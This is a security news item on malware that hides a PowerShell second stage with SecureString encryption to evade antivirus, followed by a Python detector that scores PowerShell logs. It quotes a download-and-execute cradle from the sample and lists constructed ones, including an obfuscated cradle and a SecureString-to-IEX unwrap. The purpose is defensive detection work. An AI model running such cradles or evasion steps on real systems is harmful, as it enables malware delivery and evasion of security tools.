Delaware, USA – September 14, 2018 — Adversaries constantly refine their techniques and tools to stay undetected by common security solutions. Researchers from Cylance have published a blog post about a new tactic adversaries use to bypass antivirus products and infect users with well-known malware. In the newly discovered sample, the adversaries leverage PowerShell's SecureString for obfuscation, which allowed the payload to slip past almost all known antivirus programs at the time of analysis. The analyzed malicious archive contained a PDF and a VBS script whose first layer was obfuscated with Base64 encoding. The script carries out the next stage of the attack by launching PowerShell with the following switches: “PowersheLl -windowstyle hidden -noexit -executionpolicy bypass -command IEX(New-Object Net.Webclient).DownloadString.Invoke(‘hxxp://ravigel[dot]com/1cr[dot]dat’)”. Note the mixed-case executable name, the hidden window, the execution-policy bypass and the download-and-execute cradle: each is a well-known evasion or delivery trick, and the combination is a strong signal in its own right.
The downloaded script is encrypted with SecureString; it is used to evade automated sandboxes and to download and install a long-known espionage tool, which is likewise not detected by IOC-based antivirus solutions. In practice, "encrypted with SecureString" means the stage is shipped as the output of ConvertFrom-SecureString and decrypted at run time with ConvertTo-SecureString; when the -Key parameter is used the blob is AES-encrypted with a key that travels inside the script itself, so the plaintext only ever exists in memory and a static scanner sees nothing but ciphertext and a handful of benign-looking cmdlets.
Attackers abuse PowerShell to perform a wide range of actions, including discovery and code execution. Antivirus tools have little chance of detecting the execution of obfuscated malicious scripts. If nothing on the host records command lines and script content, for instance Sysmon or an EDR agent such as CrowdStrike, attackers can execute arbitrary commands through even the simplest backdoor and remain under the radar. PowerShell's own Script Block Logging (event ID 4104) and AMSI integration, available in PowerShell 5 and later, are worth enabling for the same reason: they capture script blocks as they are executed, so the decrypted second stage handed to IEX is logged even though the script on disk is unreadable. To detect the different methods of PowerShell abuse, you can use SIEM rules from Threat Detection Marketplace; the platform contains 126 rules to detect various PowerShell attacks: https://tdm.socprime.com/
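As an added illustration (not code from the original article, SOC Prime or Cylance), the Python script below scores PowerShell command lines and script blocks for the patterns discussed above: the hidden window, execution-policy bypass, download cradle and IEX from the quoted command, the mixed-case binary name, and a SecureString decryption layer of the kind described for the second stage. It goes slightly beyond the single sample by first undoing cheap obfuscation (backtick escapes, string concatenation) before matching. All log records are constructed for the example, the 4104 script block and the example.invalid cradle are hypothetical, and the indicator names, weights and threshold are assumptions rather than rules from Threat Detection Marketplace.

```python
"""Score PowerShell command lines and script blocks for the evasion and
delivery patterns described above (hidden window, execution-policy bypass,
download cradle, IEX, mixed-case binary name, SecureString decryption).
Added example, not SOC Prime's or Cylance's code; every record below is
constructed for illustration and indicator names and weights are assumptions."""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed records. The first reuses the command line quoted from the
# Cylance sample as a process-creation (Sysmon event 1) record; the second
# is a hypothetical ScriptBlock (PowerShell event 4104) record showing how a
# SecureString-wrapped stage is unwrapped and handed to IEX; the third is a
# hypothetical cradle obfuscated with backticks and string concatenation;
# the fourth is a benign admin command for contrast.
SAMPLE_EVENTS = [
    ("Sysmon:1", "PowersheLl -windowstyle hidden -noexit -executionpolicy bypass "
                 "-command IEX(New-Object Net.Webclient).DownloadString.Invoke("
                 "'hxxp://ravigel[dot]com/1cr[dot]dat')"),
    ("PowerShell:4104", "$k=(1..16);$s=ConvertTo-SecureString $blob -Key $k;"
                        "$p=[Runtime.InteropServices.Marshal]::PtrToStringAuto("
                        "[Runtime.InteropServices.Marshal]::SecureStringToBSTR($s));IEX $p"),
    ("Sysmon:1", "powershell -nop -w hidden -c \"I`E`X (New-Object Net.WebClient)"
                 ".('Down'+'loadString')('http://example.invalid/a.ps1')\""),
    ("Sysmon:1", "powershell.exe -NoProfile -Command Get-Service -Name Spooler"),
]

# (name, regex over the normalized text, weight). Abbreviated switches such as
# -w hidden, -ep bypass and -enc ... are matched because PowerShell accepts them.
INDICATORS = [
    ("hidden_window",       r"-w[a-z]* hid[a-z]*", 2),
    ("exec_policy_bypass",  r"-e[a-z]* (?:bypass|unrestricted)", 2),
    ("encoded_command",     r"-e[a-z]* [a-z0-9+/=]{40,}", 3),
    ("download_cradle",     r"new-object (?:system\.)?net\.webclient|download(?:string|file|data)"
                            r"|invoke-webrequest|invoke-restmethod", 3),
    ("iex",                 r"\biex\b|invoke-expression", 3),
    ("securestring_key",    r"convertto-securestring[^;|]*-k(?:ey)?\b", 3),
    ("securestring_unwrap", r"securestringtobstr|ptrtostring(?:auto|bstr|uni)"
                            r"|getnetworkcredential\(\)\.password", 2),
]

# Spellings of the interpreter name that appear in normal logs; anything
# else that lowercases to "powershell" (e.g. PowersheLl) is deliberate.
CANONICAL_NAMES = {"powershell", "powershell.exe", "PowerShell", "PowerShell.exe",
                   "POWERSHELL", "POWERSHELL.EXE"}


def normalize(text: str) -> str:
    """Undo cheap obfuscation before matching: backtick is PowerShell's escape
    character (I`E`X is still IEX to the parser), 'Down'+'loadString' is the
    same method name, and casing and whitespace carry no meaning."""
    text = text.replace("`", "")
    text = re.sub(r"['\"]\s*\+\s*['\"]", "", text)
    text = re.sub(r"\s+", " ", text)
    return text.lower()


def case_mangled_binary(text: str) -> bool:
    """True when the PowerShell binary (with or without a path) is spelled
    with unusual casing, which is only ever done to defeat naive matching."""
    for token in re.findall(r"[\w.\\:]+", text):
        name = token.rsplit("\\", 1)[-1]
        if name.lower() in ("powershell", "powershell.exe") and name not in CANONICAL_NAMES:
            return True
    return False


@dataclass
class Finding:
    source: str
    score: int
    indicators: List[str] = field(default_factory=list)
    suspicious: bool = False


def analyze(source: str, text: str, threshold: int = 5) -> Finding:
    """Score one record. A single weak signal such as -executionpolicy bypass
    (weight 2) is common in legitimate admin scripts and stays below the
    threshold; combined with a cradle or IEX it crosses it."""
    norm = normalize(text)
    finding = Finding(source=source, score=0)
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, norm):
            finding.indicators.append(name)
            finding.score += weight
    if case_mangled_binary(text):
        finding.indicators.append("case_mangled_binary")
        finding.score += 2
    finding.suspicious = finding.score >= threshold
    return finding


def triage(events, threshold: int = 5) -> List[Finding]:
    """Score a batch of (source, text) records."""
    return [analyze(src, txt, threshold) for src, txt in events]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{f.source:16} score={f.score:2} {flag:10} {', '.join(f.indicators)}")
```

Run stand-alone, the script flags the first three records and passes the benign one. The weighting is the point: every indicator on its own appears in legitimate administration, so a rule that fires on `-executionpolicy bypass` alone drowns analysts in noise, while the combination of a hidden window, a download cradle and IEX, or of ConvertTo-SecureString with an in-script key followed by IEX, is rarely benign. The SecureString indicators only work on script block content, which is why Script Block Logging or an EDR that records script text matters more than command-line logging alone for this sample.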